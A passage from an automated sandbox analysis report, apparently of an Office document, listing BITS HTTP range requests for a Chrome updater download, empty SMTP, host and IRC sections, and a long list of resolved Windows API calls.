  1885.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1886.         "user-agent": "Microsoft BITS/7.5",
  1887.         "method": "GET",
  1888.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1889.         "version": "1.1",
  1890.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1891.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=6073349-7950523\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1892.         "port": 80
  1893.     },
  1894.     {
  1895.         "count": 1,
  1896.         "body": "",
  1897.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1898.         "user-agent": "Microsoft BITS/7.5",
  1899.         "method": "GET",
  1900.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1901.         "version": "1.1",
  1902.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1903.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=7950524-9798267\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1904.         "port": 80
  1905.     },
  1906.     {
  1907.         "count": 1,
  1908.         "body": "",
  1909.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1910.         "user-agent": "Microsoft BITS/7.5",
  1911.         "method": "GET",
  1912.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1913.         "version": "1.1",
  1914.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1915.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=9798268-11074633\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1916.         "port": 80
  1917.     },
  1918.     {
  1919.         "count": 1,
  1920.         "body": "",
  1921.         "uri": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1922.         "user-agent": "Microsoft BITS/7.5",
  1923.         "method": "GET",
  1924.         "host": "r4---sn-tt1e7n7k.gvt1.com",
  1925.         "version": "1.1",
  1926.         "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes",
  1927.         "data": "GET /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 21 May 2019 04:56:27 GMT\r\nRange: bytes=11074634-12296959\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r4---sn-tt1e7n7k.gvt1.com\r\n\r\n",
  1928.         "port": 80
  1929.     }
  1930. ]
  1931.  
  1932. [*] Network Communication - SMTP: []
  1933.  
  1934. [*] Network Communication - Hosts: []
  1935.  
  1936. [*] Network Communication - IRC: []
  1937.  
  1938. [*] Static Analysis: {}
  1939.  
  1940. [*] Resolved APIs: [
  1941.     "mso.dll.#1443",
  1942.     "mso.dll.#9214",
  1943.     "mso.dll.#199",
  1944.     "mso.dll.#1073",
  1945.     "mso.dll.#4255",
  1946.     "mso.dll.#3459",
  1947.     "mso.dll.#1262",
  1948.     "mso.dll.#5709",
  1949.     "mso.dll.#7353",
  1950.     "mso.dll.#5228",
  1951.     "mso.dll.#2155",
  1952.     "mso.dll.#1283",
  1953.     "mso.dll.#2024",
  1954.     "mso.dll.#5274",
  1955.     "mso.dll.#3195",
  1956.     "mso.dll.#6221",
  1957.     "mso.dll.#2314",
  1958.     "mso.dll.#408",
  1959.     "mso.dll.#2714",
  1960.     "mso.dll.#8622",
  1961.     "mso.dll.#3380",
  1962.     "mso.dll.#2052",
  1963.     "mso.dll.#677",
  1964.     "mso.dll.#469",
  1965.     "mso.dll.#7974",
  1966.     "mso.dll.#2609",
  1967.     "mso.dll.#8499",
  1968.     "oleaut32.dll.#7",
  1969.     "mso.dll.#1725",
  1970.     "user32.dll.RegisterWindowMessageW",
  1971.     "secur32.dll.FreeContextBuffer",
  1972.     "ncrypt.dll.SslOpenProvider",
  1973.     "ncrypt.dll.GetSChannelInterface",
  1974.     "bcryptprimitives.dll.GetHashInterface",
  1975.     "ncrypt.dll.SslIncrementProviderReferenceCount",
  1976.     "ncrypt.dll.SslImportKey",
  1977.     "bcryptprimitives.dll.GetCipherInterface",
  1978.     "ncrypt.dll.SslLookupCipherSuiteInfo",
  1979.     "user32.dll.LoadStringW",
  1980.     "ncrypt.dll.BCryptOpenAlgorithmProvider",
  1981.     "ncrypt.dll.BCryptGetProperty",
  1982.     "ncrypt.dll.BCryptCreateHash",
  1983.     "ncrypt.dll.BCryptHashData",
  1984.     "ncrypt.dll.BCryptFinishHash",
  1985.     "ncrypt.dll.BCryptDestroyHash",
  1986.     "crypt32.dll.CertGetCertificateChain",
  1987.     "userenv.dll.GetUserProfileDirectoryW",
  1988.     "sechost.dll.ConvertSidToStringSidW",
  1989.     "sechost.dll.ConvertStringSidToSidW",
  1990.     "userenv.dll.RegisterGPNotification",
  1991.     "gpapi.dll.RegisterGPNotificationInternal",
  1992.     "sechost.dll.OpenSCManagerW",
  1993.     "sechost.dll.OpenServiceW",
  1994.     "sechost.dll.CloseServiceHandle",
  1995.     "sechost.dll.QueryServiceConfigW",
  1996.     "cryptsp.dll.CryptAcquireContextA",
  1997.     "cryptsp.dll.CryptCreateHash",
  1998.     "cryptsp.dll.CryptHashData",
  1999.     "cryptsp.dll.CryptVerifySignatureA",
  2000.     "cryptsp.dll.CryptDestroyKey",
  2001.     "cryptsp.dll.CryptDestroyHash",
  2002.     "bcryptprimitives.dll.GetAsymmetricEncryptionInterface",
  2003.     "ncrypt.dll.BCryptImportKeyPair",
  2004.     "ncrypt.dll.BCryptVerifySignature",
  2005.     "ncrypt.dll.BCryptDestroyKey",
  2006.     "crypt32.dll.CertVerifyCertificateChainPolicy",
  2007.     "crypt32.dll.CertFreeCertificateChain",
  2008.     "crypt32.dll.CertDuplicateCertificateContext",
  2009.     "ncrypt.dll.SslEncryptPacket",
  2010.     "mso.dll.#4314",
  2011.     "sxs.dll.SxsOleAut32MapReferenceClsidToConfiguredClsid",
  2012.     "mso.dll.#6484",
  2013.     "mso.dll.#9871",
  2014.     "mso.dll.#4743",
  2015.     "mso.dll.#5452",
  2016.     "mso.dll.#2088",
  2017.     "mso.dll.#5315",
  2018.     "mso.dll.#8140",
  2019.     "user32.dll.IsWindowEnabled",
  2020.     "ole32.dll.CoGetCallState",
  2021.     "ole32.dll.CoGetActivationState",
  2022.     "advapi32.dll.RegisterWaitChainCOMCallback",
  2023.     "ncrypt.dll.SslDecryptPacket",
  2024.     "winhttp.dll.WinHttpReceiveResponse",
  2025.     "winhttp.dll.WinHttpQueryHeaders",
  2026.     "winhttp.dll.WinHttpQueryDataAvailable",
  2027.     "winhttp.dll.WinHttpReadData",
  2028.     "webservices.dll.WsCreateError",
  2029.     "ntdll.dll.EtwEventWrite",
  2030.     "ntdll.dll.EtwEventRegister",
  2031.     "ntdll.dll.EtwEventUnregister",
  2032.     "webservices.dll.WsCreateHeap",
  2033.     "webservices.dll.WsCreateReader",
  2034.     "webservices.dll.WsSetInput",
  2035.     "webservices.dll.WsFillReader",
  2036.     "webservices.dll.WsReadToStartElement",
  2037.     "webservices.dll.WsReadStartElement",
  2038.     "webservices.dll.WsReadType",
  2039.     "winhttp.dll.WinHttpCloseHandle",
  2040.     "crypt32.dll.CertFreeCertificateContext",
  2041.     "rpcrt4.dll.RpcBindingFree",
  2042.     "webservices.dll.WsFreeReader",
  2043.     "webservices.dll.WsFreeError",
  2044.     "webservices.dll.WsFreeHeap",
  2045.     "webservices.dll.WsCreateServiceProxyFromTemplate",
  2046.     "winhttp.dll.WinHttpOpenRequest",
  2047.     "winhttp.dll.WinHttpAddRequestHeaders",
  2048.     "winhttp.dll.WinHttpSendRequest",
  2049.     "winhttp.dll.WinHttpConnect",
  2050.     "winhttp.dll.WinHttpCrackUrl",
  2051.     "winhttp.dll.WinHttpSetStatusCallback",
  2052.     "winhttp.dll.WinHttpOpen",
  2053.     "winhttp.dll.WinHttpSetOption",
  2054.     "winhttp.dll.WinHttpWriteData",
  2055.     "winhttp.dll.WinHttpSetCredentials",
  2056.     "winhttp.dll.WinHttpQueryAuthSchemes",
  2057.     "winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser",
  2058.     "winhttp.dll.WinHttpGetProxyForUrl",
  2059.     "winhttp.dll.WinHttpQueryOption",
  2060.     "webservices.dll.WsOpenServiceProxy",
  2061.     "webservices.dll.WsCall",
  2062.     "webservices.dll.WsAddCustomHeader",
  2063.     "shlwapi.dll.StrStrA",
  2064.     "shlwapi.dll.UrlUnescapeA",
  2065.     "user32.dll.IsHungAppWindow",
  2066.     "cryptnet.dll.CertDllVerifyRevocation",
  2067.     "profapi.dll.#104",
  2068.     "sensapi.dll.IsNetworkAlive",
  2069.     "rpcrt4.dll.RpcBindingFromStringBindingW",
  2070.     "rpcrt4.dll.RpcBindingSetAuthInfoExW",
  2071.     "rpcrt4.dll.NdrClientCall2",
  2072.     "winhttp.dll.WinHttpSetTimeouts",
  2073.     "winhttp.dll.WinHttpGetDefaultProxyConfiguration",
  2074.     "winhttp.dll.WinHttpTimeFromSystemTime",
  2075.     "shlwapi.dll.StrStrIW",
  2076.     "mso.dll.#9175",
  2077.     "user32.dll.SetRect",
  2078.     "mso.dll.#25",
  2079.     "mso.dll.#1056",
  2080.     "mso.dll.#8136",
  2081.     "mso.dll.#8931",
  2082.     "shell32.dll.SHGetFileInfoW",
  2083.     "mso.dll.#5362",
  2084.     "mso.dll.#6044",
  2085.     "mso.dll.#6516",
  2086.     "mso.dll.#5780",
  2087.     "mso.dll.#4870",
  2088.     "mso.dll.#6046",
  2089.     "mso.dll.#1241",
  2090.     "mso.dll.#2821",
  2091.     "mso.dll.#2340",
  2092.     "mso.dll.#7287",
  2093.     "mso.dll.#5290",
  2094.     "mso.dll.#1508",
  2095.     "user32.dll.IsZoomed",
  2096.     "user32.dll.GetWindowPlacement",
  2097.     "user32.dll.GetWindowRect",
  2098.     "mso.dll.#821",
  2099.     "user32.dll.GetSystemMetrics",
  2100.     "user32.dll.MonitorFromWindow",
  2101.     "user32.dll.MonitorFromRect",
  2102.     "user32.dll.MonitorFromPoint",
  2103.     "user32.dll.EnumDisplayMonitors",
  2104.     "user32.dll.GetMonitorInfoA",
  2105.     "user32.dll.EnumDisplayDevicesA",
  2106.     "mso.dll.#2378",
  2107.     "user32.dll.SetWindowPos",
  2108.     "user32.dll.AdjustWindowRect",
  2109.     "mso.dll.#5912",
  2110.     "mso.dll.#9719",
  2111.     "mso.dll.#8824",
  2112.     "mso.dll.#6117",
  2113.     "mso.dll.#3307",
  2114.     "user32.dll.SendMessageW",
  2115.     "user32.dll.DestroyIcon",
  2116.     "mso.dll.#3813",
  2117.     "mso.dll.#1815",
  2118.     "user32.dll.PtInRect",
  2119.     "mso.dll.#1613",
  2120.     "user32.dll.SetWindowTextW",
  2121.     "user32.dll.GetClassLongW",
  2122.     "mso.dll.#8572",
  2123.     "gdi32.dll.CreateDIBSection",
  2124.     "gdi32.dll.CreateCompatibleDC",
  2125.     "gdi32.dll.GetViewportOrgEx",
  2126.     "gdi32.dll.SetViewportOrgEx",
  2127.     "gdi32.dll.SetBkColor",
  2128.     "gdi32.dll.ExtTextOutA",
  2129.     "mso.dll.#1573",
  2130.     "mso.dll.#8612",
  2131.     "user32.dll.SetScrollRange",
  2132.     "mso.dll.#2509",
  2133.     "user32.dll.BeginDeferWindowPos",
  2134.     "user32.dll.DeferWindowPos",
  2135.     "user32.dll.EndDeferWindowPos",
  2136.     "user32.dll.OffsetRect",
  2137.     "user32.dll.EnumChildWindows",
  2138.     "user32.dll.GetScrollInfo",
  2139.     "gdi32.dll.DeleteDC",
  2140.     "user32.dll.MapWindowPoints",
  2141.     "msptls.dll.?FsCreatePageFinite@Ptls6@@YGJPAUfscontext@1@PBUfsbreakrecpage@1@PAUfsnameclient@1@PAU_fsfmtr@1@PAPAUfspage@1@PAPAU31@@Z",
  2142.     "msptls.dll.?FsTransformRectangle@Ptls6@@YGJKPBUtagFSRECT@1@0KPAU21@@Z",
  2143.     "mso.dll.#6126",
  2144.     "msptls.dll.?LsCreateLine@Ptls6@@YGJPAUlscontext@1@PAUlsparaclient@1@PBUlspap@1@JPBUlslinerestr@1@PBUlsbreakrecline@1@PAPAU61@PAUlslinfo@1@PAPAVCLsLine@1@@Z",
  2145.     "gdi32.dll.GetFontRealizationInfo",
  2146.     "gdi32.dll.GetFontFileInfo",
  2147.     "gdi32.dll.GetFontFileData",
  2148.     "mso.dll.#7261",
  2149.     "mso.dll.#9540",
  2150.     "usp10.dll.ScriptGetFontScriptTags",
  2151.     "usp10.dll.ScriptGetFontLanguageTags",
  2152.     "usp10.dll.ScriptGetFontFeatureTags",
  2153.     "msptls.dll.?LsQueryLineVisibilityWord@Ptls6@@YGJPAVCLsLine@1@PAJPAH@Z",
  2154.     "msptls.dll.?LsQueryLineMaxDepth@Ptls6@@YGJPAVCLsLine@1@PAJ@Z",
  2155.     "msptls.dll.?LsModifyLineHeight@Ptls6@@YGJPAUlscontext@1@PAVCLsLine@1@JJJJ@Z",
  2156.     "gdiplus.dll.GdipCreatePath",
  2157.     "gdiplus.dll.GdipStartPathFigure",
  2158.     "gdiplus.dll.GdipAddPathLine2",
  2159.     "gdiplus.dll.GdipClosePathFigure",
  2160.     "gdiplus.dll.GdipCreateMatrix2",
  2161.     "gdiplus.dll.GdipTransformPath",
  2162.     "gdiplus.dll.GdipDeleteMatrix",
  2163.     "gdiplus.dll.GdipGetPathWorldBounds",
  2164.     "gdiplus.dll.GdipCreatePathIter",
  2165.     "gdiplus.dll.GdipPathIterRewind",
  2166.     "gdiplus.dll.GdipPathIterNextSubpath",
  2167.     "gdiplus.dll.GdipPathIterCopyData",
  2168.     "gdiplus.dll.GdipDeletePathIter",
  2169.     "gdiplus.dll.GdipAddPathLine",
  2170.     "gdiplus.dll.GdipDeletePath",
  2171.     "gdiplus.dll.GdipClonePath",
  2172.     "msptls.dll.?FsTransformPoint@Ptls6@@YGJKPBUtagFSRECT@1@PBUtagFSPOINT@1@KPAU31@@Z",
  2173.     "msptls.dll.?FsTransformVector@Ptls6@@YGJKPBUtagFSVECTOR@1@KPAU21@@Z",
  2174.     "msptls.dll.?LsDestroyLine@Ptls6@@YGJPAUlscontext@1@PAVCLsLine@1@@Z",
  2175.     "msptls.dll.?LsGetObjectName@Ptls6@@YG?AVLSNAMEEXP@1@PBVCLsDnode@1@@Z",
  2176.     "msptls.dll.?LsdnFinishWordRegular@Ptls6@@YGJPAVCLsDnode@1@JPAUlsrun@1@PBUlschp@1@PAVCLsObject@1@PBUOBJDIM@1@HHH@Z",
  2177.     "msptls.dll.?LsdnSetRigidDup@Ptls6@@YGJPAVCLsDnode@1@J@Z",
  2178.     "msptls.dll.?LsEnumLine@Ptls6@@YGJPAVCLsLine@1@HHPBUtagLSPOINT@1@@Z",
  2179.     "msptls.dll.?FsQueryPageDetails@Ptls6@@YGJPAUfscontext@1@PBUfspage@1@PAUfspagedetails@1@@Z",
  2180.     "msptls.dll.?FsQueryPageSectionList@Ptls6@@YGJPAUfscontext@1@PBUfspage@1@JPAUfssectiondescription@1@PAJ@Z",
  2181.     "msptls.dll.?FsQuerySectionDetails@Ptls6@@YGJPAUfscontext@1@PBUfssection@1@PAUfssectiondetails@1@@Z",
  2182.     "msptls.dll.?FsQuerySectionCompositeColumnList@Ptls6@@YGJPAUfscontext@1@PBUfssection@1@JPAUfscompositecolumndescription@1@PAJ@Z",
  2183.     "msptls.dll.?FsQueryCompositeColumnDetails@Ptls6@@YGJPAUfscontext@1@PBUfscompositecolumn@1@PAUfscompositecolumndetails@1@@Z",
  2184.     "msptls.dll.?FsQueryTrackDetails@Ptls6@@YGJPAUfscontext@1@PBUfstrack@1@PAUfstrackdetails@1@@Z",
  2185.     "msptls.dll.?FsQueryTrackParaList@Ptls6@@YGJPAUfscontext@1@PBUfstrack@1@JPAUfsparadescription@1@PAJ@Z",
  2186.     "msptls.dll.?FsQueryTextDetails@Ptls6@@YGJPAUfscontext@1@PBUfspara@1@PAUfstextdetails@1@@Z",
  2187.     "msptls.dll.?FsQueryLineListComposite@Ptls6@@YGJPAUfscontext@1@PBUfspara@1@JPAUfslinedescriptioncomposite@1@PAJ@Z",
  2188.     "msptls.dll.?FsQueryLineCompositeElementList@Ptls6@@YGJPAUfscontext@1@PBUfsline@1@JPAUfslineelement@1@PAJ@Z",
  2189.     "msptls.dll.?FsQueryAttachedObjectList@Ptls6@@YGJPAUfscontext@1@PBUfspara@1@JPAUfsattachedobjectdescription@1@PAJ@Z",
  2190.     "msptls.dll.?FsQueryFigureObjectDetails@Ptls6@@YGJPAUfscontext@1@PBUfspara@1@PAUfsfiguredetails@1@@Z",
  2191.     "mso.dll.#2566",
  2192.     "mso.dll.#1429",
  2193.     "mso.dll.#6502",
  2194.     "uiautomationcore.dll.UiaClientsAreListening",
  2195.     "msptls.dll.?FsDestroyPage@Ptls6@@YGJPAUfscontext@1@PAUfspage@1@@Z",
  2196.     "msptls.dll.?FsDestroyContext@Ptls6@@YGJPAUfscontext@1@@Z",
  2197.     "user32.dll.SetRectEmpty",
  2198.     "user32.dll.IntersectRect",
  2199.     "user32.dll.InflateRect",
  2200.     "mso.dll.#1100",
  2201.     "mso.dll.#7047",
  2202.     "msptls.dll.?LsQueryLineDup@Ptls6@@YGJPAVCLsLine@1@PAUlslinearea@1@@Z",
  2203.     "user32.dll.GetCursor",
  2204.     "user32.dll.GetClientRect",
  2205.     "user32.dll.SetScrollInfo",
  2206.     "user32.dll.SetScrollPos",
  2207.     "mso.dll.#3747",
  2208.     "mso.dll.#8218",
  2209.     "mso.dll.#5394",
  2210.     "mso.dll.#331",
  2211.     "mso.dll.#6829",
  2212.     "mso.dll.#539",
  2213.     "mso.dll.#4959",
  2214.     "mso.dll.#6463",
  2215.     "mso.dll.#4987",
  2216.     "user32.dll.GetWindow",
  2217.     "mso.dll.#7195",
  2218.     "mso.dll.#7573",
  2219.     "mso.dll.#445",
  2220.     "user32.dll.GetCaretBlinkTime",
  2221.     "user32.dll.CreateCaret",
  2222.     "msptls.dll.?LsQueryLineCpPpoint@Ptls6@@YGJPAVCLsLine@1@JJPAUlsqsubinfo@1@PAJPAUlstextcell@1@@Z",
  2223.     "user32.dll.DestroyCaret",
  2224.     "user32.dll.GetCaretPos",
  2225.     "user32.dll.SetCaretPos",
  2226.     "mso.dll.#5932",
  2227.     "mso.dll.#2071",
  2228.     "mso.dll.#1024",
  2229.     "mso.dll.#6245",
  2230.     "mso.dll.#9041",
  2231.     "mso.dll.#1767",
  2232.     "mso.dll.#9369",
  2233.     "mso.dll.#4617",
  2234.     "user32.dll.FillRect",
  2235.     "mso.dll.#343",
  2236.     "mso.dll.#9636",
  2237.     "mso.dll.#2022",
  2238.     "mso.dll.#4750",
  2239.     "mso.dll.#4577",
  2240.     "mso.dll.#850",
  2241.     "mso.dll.#1776",
  2242.     "mso.dll.#9026",
  2243.     "mso.dll.#4497",
  2244.     "mso.dll.#4647",
  2245.     "mso.dll.#8926",
  2246.     "mso.dll.#7212",
  2247.     "mso.dll.#5407",
  2248.     "shell32.dll.SHAddToRecentDocs",
  2249.     "mso.dll.#5152",
  2250.     "mso.dll.#3327",
  2251.     "mso.dll.#6333",
  2252.     "mso.dll.#420",
  2253.     "mso.dll.#1335",
  2254.     "mso.dll.#2041",
  2255.     "mso.dll.#7834",
  2256.     "mso.dll.#239",
  2257.     "mso.dll.#6357",
  2258.     "mso.dll.#7026",
  2259.     "mso.dll.#1671",
  2260.     "mso.dll.#8263",
  2261.     "mso.dll.#9307",
  2262.     "mso.dll.#1441",
  2263.     "mso.dll.#9223",
  2264.     "mso.dll.#6453",
  2265.     "mso.dll.#8044",
  2266.     "mso.dll.#3698",
  2267.     "mso.dll.#8565",
  2268.     "mso.dll.#8373",
  2269.     "mso.dll.#9741",
  2270.     "mso.dll.#478",
  2271.     "mso.dll.#479",
  2272.     "mso.dll.#340",
  2273.     "bcrypt.dll.BCryptOpenAlgorithmProvider",
  2274.     "bcrypt.dll.BCryptGetProperty",
  2275.     "bcrypt.dll.BCryptCreateHash",
  2276.     "bcrypt.dll.BCryptHashData",
  2277.     "bcrypt.dll.BCryptFinishHash",
  2278.     "bcrypt.dll.BCryptDestroyHash",
  2279.     "bcrypt.dll.BCryptCloseAlgorithmProvider",
  2280.     "mso.dll.#8633",
  2281.     "mso.dll.#5213",
  2282.     "mso.dll.#6163",
  2283.     "mso.dll.#552",
  2284.     "mso.dll.#5630",
  2285.     "mso.dll.#2513",
  2286.     "mso.dll.#1607",
  2287.     "mso.dll.#791",
  2288.     "mso.dll.#1848",
  2289.     "mso.dll.#8735",
  2290.     "mso.dll.#9374",
  2291.     "mso.dll.#5286",
  2292.     "mso.dll.#6368",
  2293.     "mso.dll.#4262",
  2294.     "mso.dll.#1010",
  2295.     "mso.dll.#7979",
  2296.     "mso.dll.#8549",
  2297.     "mso.dll.#8970",
  2298.     "mso.dll.#9198",
  2299.     "mso.dll.#4795",
  2300.     "ole32.dll.PropVariantClear",
  2301.     "oleaut32.dll.#9",
  2302.     "mso.dll.#1865",
  2303.     "mso.dll.#9688",
  2304.     "mso.dll.#320",
  2305.     "advapi32.dll.RegDeleteKeyA",
  2306.     "user32.dll.DestroyCursor",
  2307.     "mso.dll.#7173",
  2308.     "mso.dll.#8511",
  2309.     "mso.dll.#3299",
  2310.     "mso.dll.#7001",
  2311.     "mso.dll.#3913",
  2312.     "user32.dll.PeekMessageA",
  2313.     "mso.dll.#1380",
  2314.     "mso.dll.#9500",
  2315.     "user32.dll.TranslateMessage",
  2316.     "user32.dll.IsWindowUnicode",
  2317.     "user32.dll.DispatchMessageA",
  2318.     "user32.dll.DispatchMessageW",
  2319.     "user32.dll.UpdateWindow",
  2320.     "mso.dll.#999",
  2321.     "mso.dll.#287",
  2322.     "dwmapi.dll.DwmIsCompositionEnabled",
  2323.     "mso.dll.#1575",
  2324.     "mso.dll.#5034",
  2325.     "mso.dll.#1517",
  2326.     "mso.dll.#718",
  2327.     "mso.dll.#4708",
  2328.     "mso.dll.#8046",
  2329.     "mso.dll.#4175",
  2330.     "mso.dll.#8672",
  2331.     "mso.dll.#1990",
  2332.     "mso.dll.#3051",
  2333.     "mso.dll.#1819",
  2334.     "mso.dll.#1419",
  2335.     "oleaut32.dll.#147",
  2336.     "kernel32.dll.WerRegisterMemoryBlock",
  2337.     "dwrite.dll.DWriteCreateFactory",
  2338.     "cryptnet.dll.I_CryptNetGetConnectivity",
  2339.     "cryptnet.dll.CryptRetrieveObjectByUrlW",
  2340.     "setupapi.dll.SetupIterateCabinetW",
  2341.     "kernel32.dll.RegOpenKeyExW",
  2342.     "kernel32.dll.RegCloseKey",
  2343.     "cabinet.dll.#20",
  2344.     "cabinet.dll.#22",
  2345.     "devrtl.dll.DevRtlGetThreadLogToken",
  2346.     "cryptsp.dll.CryptSetHashParam",
  2347.     "gdi32.dll.GetCurrentObject",
  2348.     "gdi32.dll.BitBlt",
  2349.     "gdi32.dll.GetClipBox",
  2350.     "gdi32.dll.StretchDIBits",
  2351.     "user32.dll.RegisterPowerSettingNotification",
  2352.     "powrprof.dll.PowerSettingRegisterNotification",
  2353.     "user32.dll.GetWindowThreadProcessId",
  2354.     "user32.dll.GetWindowTextW",
  2355.     "advapi32.dll.RegQueryValueW",
  2356.     "apphelp.dll.ApphelpCheckShellObject",
  2357.     "advapi32.dll.RegDeleteTreeW",
  2358.     "sechost.dll.QueryServiceConfigA",
  2359.     "sechost.dll.QueryServiceStatus",
  2360.     "rpcrt4.dll.RpcStringBindingComposeA",
  2361.     "rpcrt4.dll.RpcBindingFromStringBindingA",
  2362.     "rpcrt4.dll.RpcEpResolveBinding",
  2363.     "sechost.dll.LookupAccountSidLocalW",
  2364.     "rpcrt4.dll.RpcStringFreeA",
  2365.     "xmllite.dll.CreateXmlReader",
  2366.     "riched20.dll.REExtendedRegisterClass",
  2367.     "user32.dll.GetWindowLongW",
  2368.     "user32.dll.GetSysColor",
  2369.     "user32.dll.SetWindowLongW",
  2370.     "user32.dll.RegisterWindowMessageA",
  2371.     "user32.dll.RegisterClipboardFormatW",
  2372.     "user32.dll.GetDoubleClickTime",
  2373.     "user32.dll.SetCaretBlinkTime",
  2374.     "user32.dll.SystemParametersInfoW",
  2375.     "user32.dll.GetKeyboardLayoutList",
  2376.     "mso.dll._MsoGetFidUspDll@0",
  2377.     "mso.dll._MsoLoadLocalizedLibraryEx@12",
  2378.     "usp10.dll.ScriptGetProperties",
  2379.     "usp10.dll.ScriptItemize",
  2380.     "ole32.dll.CoRevokeInitializeSpy",
  2381.     "comctl32.dll.#388",
  2382.     "user32.dll.LoadCursorW",
  2383.     "user32.dll.IsWindowVisible",
  2384.     "user32.dll.GetKeyboardLayout",
  2385.     "user32.dll.PostMessageW",
  2386.     "user32.dll.DefWindowProcW",
  2387.     "uxtheme.dll.IsThemeActive",
  2388.     "uxtheme.dll.IsAppThemed",
  2389.     "uxtheme.dll.OpenThemeData",
  2390.     "user32.dll.GetDC",
  2391.     "user32.dll.ReleaseDC",
  2392.     "user32.dll.IsIconic",
  2393.     "user32.dll.GetParent",
  2394.     "usp10.dll.ScriptGetCMap",
  2395.     "user32.dll.InvalidateRect",
  2396.     "user32.dll.HideCaret",
  2397.     "user32.dll.ShowCaret",
  2398.     "user32.dll.NotifyWinEvent",
  2399.     "user32.dll.GetWindowTextLengthW",
  2400.     "user32.dll.EnableWindow",
  2401.     "msctf.dll.SetInputScope",
  2402.     "user32.dll.GetWindowRgn",
